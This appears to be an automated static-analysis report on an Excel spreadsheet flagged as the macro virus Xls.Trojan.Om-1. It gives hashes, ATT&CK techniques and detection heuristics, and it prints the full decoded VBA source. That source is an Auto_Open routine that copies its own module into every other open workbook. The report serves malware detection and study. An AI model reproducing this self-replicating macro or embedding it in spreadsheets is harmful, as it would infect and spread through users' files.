Xls.Trojan.Om-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 63361817ddf310bb…

MALICIOUS

Office (OLE)

Size: 38.5 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 5612cce9b5fea69c91f647e0fac71373
SHA-1: 600c5778d1d4d09a5cb380cffe68605b0bb7424c
SHA-256: 63361817ddf310bbfb827ede190ade203f5f24b4801364a657a0d9ac18bfc12b
Risk Score: 120

Malware Insights

Xls.Trojan.Om-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The file is an Excel spreadsheet containing a VBA macro that is automatically executed upon opening (Auto_Open). The macro attempts to copy itself to other open workbooks, suggesting a propagation or persistence mechanism. The ClamAV detection name 'Xls.Trojan.Om-1' strongly indicates its malicious nature and likely family.

Heuristics 3

  • ClamAV: Xls.Trojan.Om-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Om-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (severity: high, rule: OLE_VBA_AUTO)
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1828 bytes
SHA-256: 04878467d418487d18c8b6db22501095cfacfda74f097f633476474bbc321449
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "OMMacro"







Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
For Each classeur In Application.Workbooks
If classeur.Name <> "OM.XLS" Then
    om = False
    For Each Feuille In classeur.Sheets
        If Feuille.Name = "OMMacro" Then om = True
    Next Feuille
    If Not om Then
    apparent = Windows(classeur.Name).Visible
    Windows(classeur.Name).Visible = True
    ThisWorkbook.Modules("OMMacro").Copy after:=Workbooks(classeur.Name).Sheets(1)
    Windows(classeur.Name).Visible = apparent
    End If 'om
End If
Next classeur

End Sub